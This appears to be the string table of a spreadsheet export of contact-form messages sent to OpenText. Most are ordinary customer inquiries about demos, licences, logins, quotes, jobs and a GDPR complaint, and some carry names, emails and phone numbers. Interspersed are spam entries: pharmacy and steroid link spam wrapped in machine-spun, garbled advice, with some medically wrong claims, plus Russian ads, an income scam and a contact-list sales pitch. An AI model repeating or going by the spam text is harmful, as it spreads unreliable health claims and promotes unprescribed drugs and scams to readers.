    <t>[url=http://www.grupogasoestaciones.com/Charts/other.php?jolick=Viagra-100mg-Ervaringen-Cialis-Belgie-Levitra-Belgien-Kaufen-238/]Viagra 100mg Ervaringen[/url]_x000D_
 With any luck ,, this information has supplied you with many very beneficial tricks and tips on handling allergic reaction and all sorts of the accompanying signs. Considering the variety of victims, it's a wonder they have got not identified a cure however, but till they generally do, you will find the helpful assistance you may have go through on this page to depend upon.Everything You Should Learn About Taking pleasure in Wine_x000D_
  [url=http://www.boderlift.com.tr/fonts/soft.php?h=1027]Buy Winstrol Pills Canada[/url]_x000D_
 It is essential to keep in mind that showing your puppy "no" fails to provide him with any info. By way of example, when someone enters into your residence, and your canine starts to bounce, saying "no" will not be sufficient information and facts. While, saying, "stay" is really a greater choice, as it gives him anything he can actually do. In the event you inform your dog what you would like him concerning a order, this helps prevent uncertainty, and the man will become familiar with to listen closely._x000D_
  [url=http://www.aanchalpk.com/inc/lib.php?dog=1462-Testosterone-Supplement-Reddit,Clomid-Australia-Price,Mesterolone-Ireland.html]Testosterone Supplement Reddit[/url]_x000D_
 Individuals devote plenty of time and effort to get their brand new home, nevertheless they normally locate their realtor by pure accident. In most cases, purchasers look for a listing they enjoy and employ the broker from the listing to represent them. It is rather practical, nevertheless the buyers' broker will symbolize the buyer within the negotiation of a buy, which is generally the best financial expense of the life. They must spend more time getting their consultant, and meet with a number of brokers well before they select the one particular they may assist._x000D_
  [url=https://.syarikat-sdnbhd.com/modules/pika.php?a=1</t>
  </si>
  <si>
    <t xml:space="preserve">My computer was recently replaced, it had a copy of Myriad installed, I believe it was version 8.1. _x000D_
My customer no. as reported by the software was 363779. _x000D_
I'm curious to know if it is possible to restore this installation. _x000D_
I have been unable to locate the physical CD and serial number / activation code, and I do not see a place where this software is downloadable... </t>
  </si>
  <si>
    <t>Employment application</t>
  </si>
  <si>
    <t>I would like to schedule a demo of your Dynamic Case Management and Process Modeling modules of AppWorks.</t>
  </si>
  <si>
    <t>I can't sign into my Hightail account, email address warren@dasint.net I have had this account for many years and now can't sign in. I last used this account only a few days ago</t>
  </si>
  <si>
    <t>Hi, I would like to have a my support account. Thanks.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am with Federated Investors and we are updating our vendor list. If you could, please email me Open Text Incorporated's updated W-9 form. Feel free to contact me with any questions._x000D_
Thank you</t>
  </si>
  <si>
    <t>I have a complimentary pass for the 3 day conference. I am trying to register for Women in technology and for some reason, I am not seeing a registration other than the one that is an initial registration with a credit card.  Could you please help?</t>
  </si>
  <si>
    <t>I've been a Hightail customer for several years. I sent files yesterday. Now, today I tried to send a file and find that Hightail no longer exists and my account is not recognized by OpenText. This is not a good way to transition customers. I just paid my monthly bill. Is that money gone?</t>
  </si>
  <si>
    <t>Looking for headless CMS options. Currently using Contentful and rolling out enterprise wide.</t>
  </si>
  <si>
    <t>Wir sind Dritthersteller und Anbieter einer Suchlösung. Über einen Partner hat ein Endkunde  bereits OpenText Content Server im Einsatz. Für Qualitätssicherungszwecke bitten wir um eine Testdownload des Produkts, um insbesondere für den gemeinsamen Kunden eine bestmögliche Lösung zu gewährleisten._x000D_
_x000D_
Bitte um ehestmögliche Rückmeldung.</t>
  </si>
  <si>
    <t>Unable to access knowledge article and other documentations. How can I get access.</t>
  </si>
  <si>
    <t xml:space="preserve">Trial Version for OpenText Content Server. Please inform us if it is possible to download the OpenText Content Sever as a trial. We are developing search soutions and would like to add support for OpenText._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Good morning! I can not contact your office in Poland in Poznan. I am asking you that the representative of your company in Poland will contact me. The case concerns 30 licenses OpenText Exceed 15. Yours faithfully, Daniel Wasilko.</t>
  </si>
  <si>
    <t>I would like to obtain use studies of application of your EIM solution to the public sector.</t>
  </si>
  <si>
    <t xml:space="preserve">Request to send invite for job opportunity- Pricipal Network Engineer </t>
  </si>
  <si>
    <t>wir befinden uns gerade in der Whitebook-Phase für die Umstellung von ERP 6.0 auf S4 HANA im Rahmen von TOM. _x000D_
In diesem Zusammenhang stellt sich uns die Frage, ob wir hier auch unseren Rechnungseingangs- und Freigabe-Prozess ändern sollen. Hier wurde uns von Beratern OpenText empfohlen._x000D_
Wir verwenden derzeit bereits ein Tool, mit dem wir die Rechnungen scannen, validieren, archivieren und einen Freigabe-Workflow starten._x000D_
Derzeit haben wir den Rechnungseingangsworkflow bei ca. 20 Buchungskreisen aktiv. Da wir diesen Prozess aber gerade noch auf die Ländergesellschaften ausrollen, werden es laufend mehr._x000D_
Wäre es möglich, einmal ein erstes kurzes Telefongespräch zwischen Ihnen, unserem Buchhaltungsleiter für DE und CH Herr Stiefel und mir einzuplanen?_x000D_
Könnten Sie mir da ein oder zwei Terminvorschläge schicken? Ich arbeite nur halbtags, daher wäre mir ein Vormittagstermin lieber. _x000D_
vielen Dank + viele Grüße_x000D_
Sonja Birrey</t>
  </si>
  <si>
    <t>Hi There, When I am trying to access knowledge centre, I am keep getting message to confirm my email. I have done this 4-5 times but its keep presenting the same page to me when I login._x000D_
thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Operations Manager openings </t>
  </si>
  <si>
    <t xml:space="preserve">недорогие грузоперевозки Россия Беларусь отзывы_x000D_
недорогие международные грузоперевозки Омск_x000D_
грузоперевозки Новосибирск_x000D_
грузоперевозки Тюмень отзывы_x000D_
грузоперевозки Россия Беларусь_x000D_
недорогие грузоперевозки Новосибирск отзывы_x000D_
международные грузоперевозки Екатеринбург_x000D_
недорогие грузоперевозки Пермь_x000D_
грузоперевозки Новосибирск отзывы_x000D_
недорогие международные грузоперевозки Тюмень отзывы_x000D_
 _x000D_
[URL="https://mityr-trans.com"]недорогие международные грузоперевозки Россия Казахстан[/URL] _x000D_
недорогие международные грузоперевозки Новосибирск отзывы_x000D_
недорогие грузоперевозки Челябинск отзывы_x000D_
международные грузоперевозки Екатеринбург_x000D_
международные грузоперевозки Красноярск_x000D_
международные грузоперевозки Челябинск отзывы_x000D_
грузоперевозки Омск отзывы_x000D_
недорогие грузоперевозки Екатеринбург_x000D_
грузоперевозки Новосибирск отзывы_x000D_
грузоперевозки Россия Казахстан отзывы_x000D_
грузоперевозки Пермь_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.gauashram.com/demo/search.php?client=1628]Trenbolone Side Effects[/url]_x000D_
 Prevent placing your entire ovum in a basket. Should you set all your dollars into one or two stocks and the ones stocks and shares are unsuccessful, you might have lost almost everything. If as an alternative you choose to broaden, you will get stocks in several locations to change to, and for that reason a much more different collection that one could see profits from._x000D_
  [url=http://www.shreechankyavidhyasankul.in/shadmin/slider.php?school=1360]Testosterone Phenylpropionate Detection Time[/url]_x000D_
 When you build an scratchy rash, be sure you go to your medical professional or perhaps the emergency room without delay. This could be an indication of Pruritis, a typical logon individuals who suffer from diabetic issues. By using a health care provider or e . r ., physicians can provide treatment for your hypoglycemia that can save your lifestyle._x000D_
  [url=http://www.atlasmaden.com/language/zare.php?s=1479-Testosterone-Suppliers-Usa,Stanozolol-Side-Effects,Testosterone-Enanthate-Suppliers-Uk]Testosterone Suppliers Usa[/url]_x000D_
 If you have important experience with the real estate marketplace, think about promoting your own home FSBO (For Sale By Manager). This is actually the market shorthand for offering a property all on your own, without the expertise of a realtor. It is really not as easy as the alternative, but it will save you significant dollars by steering clear of agents' profits._x000D_
  [url=http://www.jessicastandishphotography.com/images/achieve.php?s=1515-Testosterone-Undecanoate-Dosage-Clomiphene-Citrate-Suppliers-Trenbolone-Enanthate-Generic/]Testosterone Undecanoate Dosage[/url]_x000D_
</t>
  </si>
  <si>
    <t>Official Quotation for following items (URGENT - we need latest by Friday 5pm or Monday 12pm - please contact us via email)_x000D_
_x000D_
Hardware_x000D_
1. Tableau TX1 Forensic Imager x 2 units_x000D_
_x000D_
Software_x000D_
1. EnCase® Mobile Investigator x 1 unit_x000D_
2. EnCase® Forensics x 1 unit_x000D_
(Above issues - split license or can be both?, we need full features - since we already have 2 units EnCase® Forensics licences)_x000D_
_x000D_
Other costs and info required_x000D_
1. Maintenance fees and agreement for above hardware and software._x000D_
2. Training cost and other details (EnCase Examination)_x000D_
3. Technical support, warranty and service after sales</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.dann.be/wp-content/event.php?uk=921-Oxymetholone-Results,Clomid-Australia-Price,Mesterolone-Ireland.html]Oxymetholone Results[/url]_x000D_
 Carry out some tongue exercises. A common source of heavy snoring may be the tongue sliding back in the direction of your neck and obstructing the environment passageway. Doing tongue workouts can strengthen the tongue to sculpt this muscle mass. Stick your tongue straight out so far as it is possible to, then relocate it from kept to right, all around._x000D_
  [url=http://www.conservepiso.com.br/erros/publish.php?h=1070]Nandrolone Decanoate Dosage[/url]_x000D_
 Pursuing these pointers will help to give you the physique that you would like. This will likely result in a excellent many benefits for you personally each emotionally and bodily. When you may have the amount of health and fitness which you usually planned on, you will begin to seem like a better and a lot more total man or woman.Remarkable Assistance To Stop Your Snoring loudly And Get Some Sleeping_x000D_
  [url=http://www.henleazegardenclub.co.uk/assets/list.php?a=417-Viagra-Homme,Levitra-20mg-Prix,Prix-Viagra-En-Pharmacie-Maroc]Viagra Homme[/url]_x000D_
 In case you have experienced a panic attack before, it is necessary to never dwell about the sensations from that strike. When these attacks are of course unsettling, considering an strike might cause some people to have another. In case you are experiencing stress and anxiety from a panic attack, handle those ideas the same way you would probably the strike itself and exercise some relaxing tactics like deep breathing._x000D_
  [url=http://www.hcpindia.co.in/images/list.php?a=435-Viagra-Pharmacie-Suisse,Kamagra-Jelly,Viagra-GÃ©nÃ©rique-Suisse]Viagra Pharmacie Suisse[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are looking at an Enterprise Content Management (ECM) system and are proceeding to market with a Request for Tender (RFT) shortly._x000D_
_x000D_
I would like to get in contact with the OpenText team to allow to us ask questions of the product prior to the RFT release._x000D_
_x000D_
Can you please contact me on the number listed between Monday-Thursday?  Otherwise if you could please contact me via email._x000D_
_x000D_
Thanks,_x000D_
Josh Keegan</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I’m looking for assistance with a quote for the items below please._x000D_
_x000D_
Description																				Qty_x000D_
FY19 SW Maint Renwl for Exceed (10-99), per client, VPS# V112271-000, Part#: EXMPi550701M0000Z-1; Qty=10; PoP: 10/1/2018 - 9/30/2019; ReqOrg: Columbus;	10_x000D_
FY19 SW Maint Renwl for Exceed (10-99), per client, VPS# V114576-000, Part#: EXMPi550701M0000Z-1; Qty=56; PoP: 10/1/2018 - 9/30/2019; ReqOrg: Mechbg;		56_x000D_
FY19 SW Maint Renwl for Exceed (100-199), per client, VPS# V030293-000, Part#: EXMPi550701M0000Z-2; Qty=75; PoP: 10/1/2018 - 9/30/2019; ReqOrg: OKC;		75_x000D_
FY19 SW Maint Renwl for Secure Shell (10-99), per client, VPS# V030293-000, Part#: SPMPi570701M0000Z-1; Qty=50; PoP: 10/1/2018 - 9/30/2019; ReqOrg: OKC;	50_x000D_
FY19 SW Maint Renwl for Secure Shell (10-99), per client, VPS# V097463-000, Part#: SPMPi570701M0000Z-1; Qty=18; PoP: 10/1/2018 - 9/30/2019; ReqOrg: OKC;	18_x000D_
FY19 SW Maint Renwl for Exceed (100-199), per client, VPS# R113510-000, Part#: EXMPI550700M0000Z; Qty=13; PoP: 10/1/2018 - 9/30/2019; ReqOrg: Ogden;		13_x000D_
FY19 SW Maint Renwl for Exceed (1-4), per client, License# 50814-12473, VPS# RC323199; Qty=2; PoP: 11/1/2018 - 9/30/2019 (short PoP); ReqOrg: Denver;		02_x000D_
_x000D_
This is for:_x000D_
Agency : Department of Defense_x000D_
Agency : Defense Information Systems Agency_x000D_
_x000D_
First Name : Mario _x000D_
Last Name : Santizo_x000D_
Agency : Department of Defense_x000D_
Address1 : 5000 Letterkenny Rd, #250,_x000D_
City : CHAMBERSBURG_x000D_
State : PA_x000D_
Zip : 17201_x000D_
_x000D_
18022984_x000D_
_x000D_
Cheers,_x000D_
_x000D_
Miguel Lamenca Jr._x000D_
New Tech Solutions Inc_x000D_
4179 Business Center Drive_x000D_
Fremont, CA 94538 _x000D_
18022984_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in discussing about the database of  Data &amp; Analytics Sector ?_x000D_
_x000D_
We have the complete contact details and verified email addresses of Business Intelligence , Analytics, Innovation, Data Analyst, VP/Director or Senior Manager Analytics or Analysis, VP/Director or Senior Manager Business Intelligence, Big Data VP/Director or Senior Manager, CIO, CTO, VP/Director or Senior Manager IT, Enterprise Architects, CMO, VP/Director or Senior Manager Marketing, VP/Director or Senior Manager Digital Marketing and all manner of people from various industries who might be interested in your product/services._x000D_
_x000D_
Industries: Retail, Finance, E-commerce, Healthcare, Information Technology, Hospitality, Education, Toy and Games, Law firms, Mining, Oil and Gas, Waste Water management , Energy &amp; Utility, Transportation, Manufacturing, Finance, Insurance, Food &amp; Beverage, Construction, Automobiles, Defense, Aviation and many more._x000D_
_x000D_
Kindly let me know your target criteria:_x000D_
_x000D_
Target Industry :_x000D_
Target Job Title :_x000D_
Target Geography :_x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Best Regards,_x000D_
James Collins</t>
  </si>
  <si>
    <t>Looking for a tool to streamline project workflows and processes.</t>
  </si>
  <si>
    <t>Pricing on 2 channel analog fax appliance (A102?).</t>
  </si>
  <si>
    <t>I have a PO for you for $40,000.00 our sales rep is no longer with your company._x000D_
where do I send the PO and the signed agreement?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.vardanega.com.br/wp-content/crypt.php?theme=855]Oxandrolone Powder Conversion[/url]_x000D_
 Make certain to take an added t-shirt with you on the airplane while you are traveling with a new baby or toddler. You can actually make sure you deliver one for your partner, however, you never think of 1 for yourself! In the restricted area such as the aircraft, you will never know what type of a crash could come about, so it will be great to have something diffrent to change into._x000D_
  [url=http://www.gencyber-ou.org/Content/file.php?k=1700-T3-Hormone-Medication,Anavar-Uk,Anavar-Oxandrolone-Tablets.html]T3 Hormone Medication[/url]_x000D_
 Regular screenings are very important for women and men. As girls are susceptible to cancers of the breast, men are prone to prostate cancers. Just like breast cancer, early recognition will provide the man his very best probability at effectively adding it in remission. It is prudent as a result to be screened typically._x000D_
  [url=http://www.allentownstpatricksparade.com/contact/banner.php?v=326-Igf-1-Lr3-Vs-Des,Hygetropin-Hgh-Side-Effects,Igf-1-Lr3-Post-Workout]Igf-1 Lr3 Vs Des[/url]_x000D_
 When you need to photograph some thing look all over the place. Even when you are really intrigued by an object you might find something more authentic correct powering you. Think of an environment or even an result you want instead of a physical object you are going to build your picture close to._x000D_
  [url=http://www.arihantpharma.in/admin/box.asp?a=406-Viagra-GĂ©nĂ©rique-Belgique,Levitra-GĂ©nĂ©rique-Suisse,Prix-Viagra-Generique-En-Pharmacie]Viagra GĂ©nĂ©rique Belgique[/url]_x000D_
</t>
  </si>
  <si>
    <t>Member of GPO</t>
  </si>
  <si>
    <t>I'm not able to pay my invoice on your website (9000600320) with my credit card. Declined message...</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
I am conducting market research at USAID on ediscovery, case management, and litigation hold tools, and would like to set up an informational meeting with Open Text. Could you please have someone contact me to schedule? Thanks very much,_x000D_
Megan Metcalf</t>
  </si>
  <si>
    <t>I've registered and have a login ID, but when I attempt to set up an account and hit submit, it errors out (no specific error msg is displayed)</t>
  </si>
  <si>
    <t xml:space="preserve">I need to know if there is any tool to test Java applications running under your XWindow, something like WinRunner (Now UFT). </t>
  </si>
  <si>
    <t>request access for knowledge base and my support</t>
  </si>
  <si>
    <t>Hello, I updated my email address to reflect the email address change at SSM St Louis and now I can no longer access the VIM knowledge base.  Thank you for your help! Keith</t>
  </si>
  <si>
    <t>I'm not able to download Documentum D2 installer, please help. _x000D_
Error: Documentum D2 - Sorry, you are not entitled to download the software for this product</t>
  </si>
  <si>
    <t>Want to get employed in your company.</t>
  </si>
  <si>
    <t>Does Open Text AppWorks (or any of your allied products) support integration with 3rd party content analysis software?  For example, we might wish to run our own text analytics on case documents, and push the resultant metadata back into the case file as part of our decision workflow. These analytics could be written in any language, and may evolve over time, but we would expect to adhere to a common interface (API) to OpenText.  _x000D_
Is this possible with your product?_x000D_
Thanks for your help!</t>
  </si>
  <si>
    <t>Дoбpый день! _x000D_
 _x000D_
Cиcтeмa дoходa от 30 000 pуб в день _x000D_
 _x000D_
нa пpодаже Baшeго интеpнет-трафика _x000D_
 _x000D_
Нaчинaйте зapaбaтывaть пpямо cейчac! _x000D_
 _x000D_
Пoдробнocти здеcь! Вектор</t>
  </si>
  <si>
    <t>Hola, me gustaría que me den una demo del sistema. Muchas gracias y saludos,</t>
  </si>
  <si>
    <t>We are exploring various DAM services to see what options are available and what will meet the needs of our firm.</t>
  </si>
  <si>
    <t>Hej,_x000D_
_x000D_
Vi har tidigare haft kontakt med Anna Himmerstål gällande inköp av eventprodukter men hon tycks ha slutat hos er?_x000D_
_x000D_
Är ni snälla och lotsar mig vidare till hennes ersättare?_x000D_
_x000D_
Tack på förhand!_x000D_
_x000D_
Med vänlig hälsning_x000D_
Elisabet</t>
  </si>
  <si>
    <t>Why am I receiving multiple e-mails on the same webquote?  Today I received 3 e-mails on the same quote?</t>
  </si>
  <si>
    <t>Bonjour, je suis stagiaire et je utilise "OpenText Information Hub 16.4"  et il me reste que 7 jour dans la période d'essai je vais avoir qu’est-ce que je doit faire sachant que je vais passé aprés à la phase de production._x000D_
S'il vous plais vous pouvez me donné touts les informations merci et bonne journée.</t>
  </si>
  <si>
    <t xml:space="preserve">I recently started managing legal applications at A+E and I would like to schedule a product demo of eDocs. I'd like to understand the feature set and ask questions. </t>
  </si>
  <si>
    <t>E-Dossiers, DMS</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Yesterday (June 26th) I applied for a job opportunity and created an account. I did not receive a confirmation email so I wanted to check on your website by logging into my account. I was not able to sign in so I applied for a new password: The answer is: If this email address...is associated  with an account in our records, you will receive an email.... Well, I did not receive an email (also not in the junk folder). When I apply for a new account the message comes up, my email already exists. Please help creating an account for juergent@yahoo.com, thanks._x000D_
Kind Regards,_x000D_
Juergen_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
können Sie mir einen vertrieblichen Ansprechpartner nennen der für uns zuständig ist?_x000D_
Vielen Dank,_x000D_
Freundliche Grüße_x000D_
i. V. Hans-Martin Gross_x000D_
Gebr. Heller Maschinenfabrik GmbH _x000D_
Gebrüder-Heller-Straße 15, 72622 Nürtingen, Deutschland _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Tell us please, the value of Brava! Desktop CXL:_x000D_
Product Price: $ 145.00 + * Maintenance: $ 29.00 total $ 174 is a one-time payment for an unlimited license, or for one year?_x000D_
</t>
  </si>
  <si>
    <t>I need the latest version of Spicer Imagenation as I need to reinstall it after a PC crash. I have the security dongle .</t>
  </si>
  <si>
    <t>We are exploring a system that can support us to store the co-worker personal file digitally. Our company is operating in Southeast Asia, is your product available in this region? Thank you.</t>
  </si>
  <si>
    <t>GDPR complaint.  You contacted me having got my details from LinkedIn where I clearly have stated I do NOT want my details used for marketing.  When I complained to the sales guy and asked for clarification who your supervisory authority was for me to complain, he put the phone down on me having refused to advise me how I can exercise my rights with your organisation.  _x000D_
So much for selling GDPR compliance when you cannot even comply with GDPR.  _x000D_
And you don't even understand consent - if I am contacting you with a query, this is Legitimate Interest basis of processing.  The fact you fail to understand this speaks volumes about why I would not even consider your company for gdpr support in mine.  _x000D_
Your privacy policy is not legal.  Collecting my data for the purpose of contacting me with my complaint is a different purpose to marketing but you are inferring in your privacy policy that by providing it I am giving consent.  _x000D_
I DO NOT consent for any information I provide in this complaint to be used for marketing, but I am forced to provide consent in order to submit this form.  I am not sure what part of "freely given" you misunderstand but if I MUST consent in order for this to be submitted it is not a legal, valid consent.  _x000D_
Default opt in to use personal data submitted for complaining to you does not constitute a valid GDPR consent even if I tick below.  How can you get this so wrong and promote yourselves as selling GDPR compliance?  _x000D_
I want to start with my Article 15 right of access and my Article 19 notification rights with your organisation.  And I still want to know which supervisory authority to complain to since I was called from one of your Swedish offices but the guy put the phone down when I asked that question.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
 _x000D_
HireRight is a background screening company appointed by one of the Clients to verify information for the purposes of a pre-employment screening report and have been asked to confirm employment of one of your former employees employed at the company in Waterloo Ontario._x000D_
 _x000D_
Please note that due to the Data Protection Act I cannot disclose any information concerning the Candidate in this e-mail as it can be released only to HR Department or the person responsible for providing references. _x000D_
_x000D_
Could you please forward this e-mail to the relevant person/department or please provide the appropriate contact details and I will send the request for verification with the Candidate's details and their signed authorization._x000D_
_x000D_
Thank you in advance for your kind assistance._x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous recherchons un prestataire afin de mettre en place 2 workflows documentaires dans LiveLink (OTCS 16.2). Nous avons déjà réalisé des workflows mais nous souhaitons les améliorer (utilisation de formulaires de saisies) et nous avons des difficulté pour trouver quelqu'un qui pourrait intervenir sur notre système. Il y aurait également une phase de transfert de compétence. J'estime entre 2 à 4 jours de prestation. Nous avons contécté Sollan (notre prestataire historique) qui a dû décliner._x000D_
Par avance merci de votre aide.  Cordialement.</t>
  </si>
  <si>
    <t xml:space="preserve">we would like to upgrade or current implementation of ECM to enterprise as will as increase the benefits of using Open Text ECM by incorporate Digital signature  </t>
  </si>
  <si>
    <t>I would like to get access to the installation guides and support KB articles on Opentext.  I work for SAP and frequently architect Opentext solutions for customers.  Can you please help?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.transit-tuning.co.uk/forms/assets.php?a=31]Cialis 5 Precio[/url]_x000D_
 Don't invest your hard earned money in community inexpensive gift idea outlets. Find what your journey spot is famous for, and invest in a good quality object or two. When, gift item outlets could be more affordable, they develop the notion that vacationers don't really know what they're getting and make the most of it. You will be normally sold things that are improperly made and are certain to collapse after you return home. To head off being swindled by residents, put money into something of high quality._x000D_
  [url=http://www.kanat-tr.com/images/assets.php?b=4]Buy Cialis In New Zealand[/url]_x000D_
 When organising a wedding event book your party area at the earliest opportunity. It's great to take your time considering as many locations as you possibly can and undertaking plenty of analysis, but waiting too long to guide a time could cause your selected place receiving taken by other people._x000D_
  [url=http://www.fineworks-uk.co.uk/wp-content/fe.php?id=197]Kamagra Gel Vrouwen[/url]_x000D_
 Save sauces in ice-cubes cube trays. If one makes numerous dishes during the 7 days, consider saving sauces from their website in ice-cubes cube containers. This will allow you to then add interesting selection to your meals you may be creating afterwards within the week. It will also make your approach easy._x000D_
  [url=http://www.visualdesignfs.ch/wp-content/utilities.php?smsite=318-Cheap-Stanozolol,Clomid-Australia-Price,Mesterolone-Ireland/]Cheap Stanozolol[/url]_x000D_
</t>
  </si>
  <si>
    <t>消息消息消息</t>
  </si>
  <si>
    <t>Продаем матрасы собственного производства _x000D_
Матрас РВ цв         460-1300 руб _x000D_
Матрас детский РВ    400 руб _x000D_
Подушка РВ           160 руб _x000D_
Подушка синтепон     155 руб _x000D_
Внимание Новинка! Предлагаем спальные комплекты для рабочих: матрас 70х190 п/э + одеяло 1сп. + КПБ п/э 1сп. + подушка 60х60. _x000D_
Цена 1500 руб!!! _x000D_
 _x000D_
 _x000D_
ICQ 726166382</t>
  </si>
  <si>
    <t>Dear Opentext:_x000D_
 I would like to bring in several exciting Israeli cybersecurity startups to Montreal for a town hall with Canadian experts such as yourselves. Could you be interested in such a venture?_x000D_
Thanks,_x000D_
Gerry Cartman, MD</t>
  </si>
  <si>
    <t>We want to be setup as a partner for OpenText deployment and implementation opportunities.</t>
  </si>
  <si>
    <t>inquiry re: Enterprise World 2018 Speakers - last-minute opportunities?</t>
  </si>
  <si>
    <t>I didn't recieve my username and password.</t>
  </si>
  <si>
    <t>1.  Need a software package that will work on Windows 7 Ultimate._x000D_
2.  Has to work with existing scanner! Xerox Documate 150.  _x000D_
3.  Need to be able to pick a total of only 5 fields for extraction._x000D_
4.  Need each individual ticket that we scan in to be saved in it's own Adobe Format. Or service order which is on 8 1/2 by 11 standard paper._x000D_
5.  Only need on Licenses! _x000D_
6.  Software must be locally installed and stored on client's PC._x000D_
I hope this helps you understand our environment and what we are looking for.  _x000D_
I am looking to have a software trial copy of what ever software you offer and recommend for our daily tasks._x000D_
Thank you._x000D_
Nick</t>
  </si>
  <si>
    <t>I am registered to the opentext site but I can't access the knowledge resource._x000D_
I received the confirmation mail and opened the confirmation link but still can't access to this resource._x000D_
Should I register to any other resources on the opentext site?_x000D_
_x000D_
Thank you,_x000D_
Best Regards._x000D_
_x000D_
Fabrizio Russello</t>
  </si>
  <si>
    <t>enterprise secure fax solution</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, my name is Richard Vallée, Program Manager for Renewed Computer Technology in Ottawa a nonprofit organization that is funded by Industry Canada._x000D_
_x000D_
Our program is a new initiative for the Ottawa and surrounding regions and is centered on helping clients that are of low income access renewed laptops and desktop computers. _x000D_
 _x000D_
At this time we are looking at developing partnerships with some key IT companies for potential donations of laptops or desktop computers that you may have and are no longer using.  _x000D_
_x000D_
Your help in providing us with donations will support RCT’s mission of providing technology to those in need &amp; hiring youth and volunteers across the province._x000D_
_x000D_
Donations will support training initiatives for youth and purchasing of components to enhance our computer packages._x000D_
_x000D_
If you do have computers that you would like to donate to RCT please feel free to contact me at your earliest convenience._x000D_
_x000D_
Kind regards_x000D_
Richard Vallee_x000D_
613-688-2150_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interested in your Business Analytics suite product</t>
  </si>
  <si>
    <t xml:space="preserve">Fax Number Issues._x000D_
</t>
  </si>
  <si>
    <t>I worked with LiveLink in 1999. I remember it having very robust workflow and document management capabilities.  I know the platform has morphed at least once (from o-script to Java) since, and I am curious what your contract lifecycle management capabilities are, and specifically what your implementation on Salesforce can do._x000D_
_x000D_
Please let me know if we can set up a discussion._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Would like to have our account manager notify me to provide information on how to order additional fax lines for our department..</t>
  </si>
  <si>
    <t>for OpenText Business Network, am I able to integrate this into my company's ERP?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, i am coordinating with Processflow for Rightfax upgarde and need to download media. However, system won't allow me to download the media. can you please grant the required access. </t>
  </si>
  <si>
    <t xml:space="preserve">Regarding job </t>
  </si>
  <si>
    <t>Need additional licenses for testing.</t>
  </si>
  <si>
    <t xml:space="preserve">We are considering implementing TrustedLink on the IBMi.  I would like to establish a sales contact and possibly schedule a demo for the EDI products you have available for implementation on the IBMi  </t>
  </si>
  <si>
    <t>Hello. I work for Lynn Community Health Center. We have Epic for our EHR and are looking to install rightfax._x000D_
Is it possible to have this done? Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there, how can I get a demo of your software? You'll see I need to see it and show it to my boss and get the approbation for it._x000D_
Thanks, and have a good day._x000D_
Nestor </t>
  </si>
  <si>
    <t xml:space="preserve">Exactly - Do not panic! In most situations, deleted data can recreate - even if you have cleared the trash or did not used the trash when deleting files. _x000D_
For effective recovery lost data very important implement specific activities. Do not be discouraged - for this, it is not necessary to be an expert in the field of information technology, you also do not need to pay hundreds of dollars to a specialist  professional for restoration of your remote information. _x000D_
[url=http://bestdatarecovery.info/how-to-use-file-recovery-software]file recovery software[/url] </t>
  </si>
  <si>
    <t>We are a company of 500 people, looking for a solution primarily for document management, which includes the versioning of documents, the optimization in the edition of information, that is, when editing an information field, it is updated in all the documents that also use this field. It would be ideal if we could edit the documents in forms and then generate custom reports. Finally, we also require that you can add attachments</t>
  </si>
  <si>
    <t>Buongiorno faccio parte del reparto fatture fornitori ho necessità di chiarimenti in merito a vostre fatture intestate all'azienda FCA. Urgente</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We're looking for a document management system and I've been told that Documentum is one._x000D_
Could you please confirm and send me some documentation about this solution, as well as pricing details ?_x000D_
_x000D_
Thank you and have a nice day._x000D_
Best regards,_x000D_
_x000D_
Sebastien Thevenaz</t>
  </si>
  <si>
    <t>Easylink Account # 0000000087003_x000D_
_x000D_
Do we need to give you a notice when terminating this service? If so how long and what is the fee for not giving a notice._x000D_
Thank You_x000D_
Elmer Gordner_x000D_
585-295-4213</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in quote for eDocs. </t>
  </si>
  <si>
    <t>(from Singapore) We are a company in singapore providing training course . Example: effective telephone techniques, powerful sales presentation skills, etc.. I would like to request for Singapore contact HR / GM (Email address) where we could send them more details of how our training courses can assist the organization in achieving greater benefits.</t>
  </si>
  <si>
    <t>There are different ways to fry tomatoes, but each of them will require cook to spend several hours in the kitchen, so this dish is usually better correct  prepare on weekends or for special occasions. When tomatoes are roasted, they get a deep taste and are combined with seafood, antipasto and other roasted vegetables. Moreover, they are good suitable for use in the baking industry, in making bread or cake with custard. _x000D_
[url=http://stewedtomatoes.top/homemade-stewed-tomatoes-recipe]http://stewedtomatoes.top/homemade-stewed-tomatoes-recipe[/url]</t>
  </si>
  <si>
    <t>eee</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to login to my support. the above mail is not verified. Please fix this._x000D_
_x000D_
thanks_x000D_
carl_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sales Representative,_x000D_
_x000D_
I am contacting you on behalf of LYST Technologies in order to clarify a few questions from our side._x000D_
LYST Technologies (“LYST”) is a leading System Integrator of world-class business solutions. We develop, deliver and support innovative software and services that harness 21st century technologies in new and different ways to help our customers manage their organizations effectively and drive down the costs of doing business by leveraging our industry-wide experience, deep technology expertise, comprehensive portfolio of services and vertically aligned business model._x000D_
